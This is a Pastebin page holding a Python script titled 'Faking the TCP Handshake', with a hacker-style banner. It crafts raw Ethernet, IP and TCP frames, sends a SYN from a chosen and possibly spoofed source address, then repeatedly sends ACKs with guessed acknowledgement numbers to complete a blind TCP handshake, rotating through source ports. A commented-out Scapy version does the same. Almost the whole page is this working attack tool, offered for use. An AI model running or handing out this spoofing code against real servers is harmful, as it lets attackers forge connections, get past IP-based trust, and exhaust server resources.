Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Faking the TCP Handshake
- # - Luc Gommans
- # http://lgms.nl/blog-2
- # Mirrors:
- # https://ghostbin.com/paste/rxg3o
- # https://cryptobin.org/s0i4y6v3
- # passwd: anonsec
- #
- # \!/ EVERYTHING IS VULNERABLE, SECURITY IS AN ILLUSION \!/
- #
- import sys, time, struct, socket, array
- if len(sys.argv) != 6:
- print("Usage: ./tcspoof.py iface srcMAC gatewayMAC srcIP:sport-range dstIP:dport")
- print("E.g. ./tcspoof.py eth0 aa:bb:dd:99:88:77 aa:bb:cc:00:11:22 1.2.3.4:1024-65535 80.100.131.150:80") # 'DELETE / HTTP/1.0\\n\\n'")
- print("The source port range is inclusive.")
- print("NOTE: appending payload currently not supported for a couple reasons.")
- sys.exit(1)
- ### Parse parameters
- dev = sys.argv[1]
- ourMAC = sys.argv[2]
- dstMAC = sys.argv[3]
- srcIP, srcPort = sys.argv[4].split(':')
- srcPort = srcPort.split('-')
- srcPort[0] = int(srcPort[0])
- srcPort[1] = int(srcPort[1])
- dstIP, dstPort = sys.argv[5].split(':')
- dstPort = int(dstPort)
- # Convert hexadecimal (aa:bb:cc) to binary (\xaa\xbb\xcc)
- mac = ''
- for macpart in dstMAC.split(":"):
- mac += chr(int(macpart, 16))
- dstMAC = mac
- mac = ''
- for macpart in ourMAC.split(":"):
- mac += chr(int(macpart, 16))
- ourMAC = mac
- ### End of parameter parsing
- # Precompute some fields that we are going to use a lot
- srcIP2 = socket.inet_aton(srcIP) # 32 bits
- dstIP2 = socket.inet_aton(dstIP) # 32 bits
- struc20 = struct.pack("!H", 20)
- winsize = struct.pack("!H", 0xeffe)
- # Checksumming is taken from Scapy.
- if struct.pack("H",1) == "\x00\x01": # big endian
- def checksum(pkt):
- if len(pkt) % 2 == 1:
- pkt += "\0"
- s = sum(array.array("H", pkt))
- s = (s >> 16) + (s & 0xffff)
- s += s >> 16
- s = ~s
- return s & 0xffff
- else:
- def checksum(pkt):
- if len(pkt) % 2 == 1:
- pkt += "\0"
- s = sum(array.array("H", pkt))
- s = (s >> 16) + (s & 0xffff)
- s += s >> 16
- s = ~s
- return (((s>>8)&0xff)|s<<8) & 0xffff
- def build_ip_header(datalength, srcIP, dstIP):
- version = 4 # 4 bits
- headerlen = 5 # 5*32bits = 20 bytes # 4 bits
- dscp = 0 # 6 bits
- ecn = 0 # disable capability # 2 bits
- totalLength = datalength + 20 # 16 bits
- identification = 22641 # random # 16 bits
- flags = 0 # 3 bits
- fragmentOffset = 0 # 13 bits
- ttl = 64 # 8 bits
- proto = 6 # 8 bits
- chksum = 0 # initial value # 16 bits
- srcIP = socket.inet_aton(srcIP) # 32 bits
- dstIP = socket.inet_aton(dstIP) # 32 bits
- # Convert fields to binary
- version_headerlen = chr(((version & 0xf) << 4) | headerlen & 0x0f)
- dscp_ecn = "\0"
- totalLen = struct.pack("!H", totalLength)
- ident = "xD"
- flags_fragmentOffset = "\0\0"
- ttl = chr(64)
- proto = chr(6)
- chksum = "\0\0"
- without_checksum = version_headerlen + dscp_ecn + totalLen + ident + flags_fragmentOffset + ttl + proto + chksum + srcIP + dstIP
- chksum = checksum(without_checksum)
- if chksum == 0:
- chksum = 0xffff
- return without_checksum[:10] + chr(chksum >> 8) + chr(chksum & 0xff) + without_checksum[12:]
- # Create a static IP header, 60% performance increase over computing it every time
- ip_header = build_ip_header(20, srcIP, dstIP)
- def build_tcp_header(sport, seqno, ackno, syn):
- dataOffset = chr(0b01010000) # header length (5) + 3 bits waste (000) + NS flag (0)
- if syn == True:
- flags = chr(0b00000010) # syn flag set, all other flags NOT set
- else:
- flags = chr(0b00010000) # ack flag set, all other flags NOT set
- without_checksum = struct.pack("!HHLL", sport, dstPort, seqno, ackno) + dataOffset + flags + winsize + "\0\0\0\0"
- # This pseudo-header has to be used in checksum computation (see TCP RFC)
- pseudoHeader = srcIP2 + dstIP2 + '\0' + chr(6) + struc20
- chksum = checksum(pseudoHeader + without_checksum)
- if chksum == 0:
- chksum = 0xffff
- return without_checksum[:16] + struct.pack("!H", chksum) + without_checksum[18:]
- def build_syn(ourMAC, dstMAC, srcIP, srcPort, dstIP, dstPort):
- eth_header = dstMAC + ourMAC + "\x08\x00" # type=IP
- tcp_header = build_tcp_header(srcPort, 42, 0, True)
- ip_header = build_ip_header(len(tcp_header), srcIP, dstIP)
- return eth_header + ip_header + tcp_header
- def build_ack(srcPort, ackno):
- eth_header = dstMAC + ourMAC + "\x08\x00" # type=IP
- tcp_header = build_tcp_header(srcPort, 43, ackno, False)
- return eth_header + ip_header + tcp_header
- # Create a socket to send raw ethernet frames over
- sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
- bind = (dev, 0)
- starttime = 0
- sport = srcPort[0] - 1
- try:
- while True:
- # Every 18 seconds (to compensate for latency), send a new SYN packet and start over
- if time.time() - starttime > 18:
- sys.stdout.write('.')
- # Since we write to stdout/stderr manually, we also need to flush manually...
- sys.stdout.flush()
- sys.stderr.flush()
- sport += 1
- if sport > srcPort[1]:
- sport = srcPort[0]
- try:
- sock.sendto(build_syn(ourMAC, dstMAC, srcIP, sport, dstIP, dstPort), bind)
- except socket.error:
- sys.stderr.write('!')
- ackno = 1
- starttime = time.time()
- # Wait 100ms to make sure our ACK doesn't arrive before the server sent the SYN+ACK
- time.sleep(0.1)
- try:
- sock.sendto(build_ack(sport, ackno), bind)
- except socket.error: # This happened a lot when sending on 8 cores when the transmit buffer was full (virtual NICs are slow...)
- sys.stderr.write('!')
- ackno += 1
- except KeyboardInterrupt:
- print("Caught keyboard interrupt.")
- '''
- Old code from Scapy, but scapy is way too slow to use here (hence the above own implementation...)
- syn = ip / TCP(sport = port, dport = 80, flags = 'S', seq = 42)
- synack = sr1(syn)
- starttime = time.time()
- while True:
- sendp(eth / ip / TCP(sport = synack.dport, dport = 80, flags = "A", seq = synack.ack, ack = RandNum(1, 65535)), iface = 'eth0')
- if time.time() - starttime > 22:
- break
- send(ip / TCP(sport = synack.dport, dport = 80, flags = "A", seq = synack.ack, ack = synack.seq + 1))
- data = ip / TCP(sport = synack.dport, dport = 80, flags = "A", seq = synack.ack, ack = synack.seq + 1) / 'GET / HTTP/1.0\r\nHost: lgms.nl\r\n\r\n'
- print(sr1(data))
- '''
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement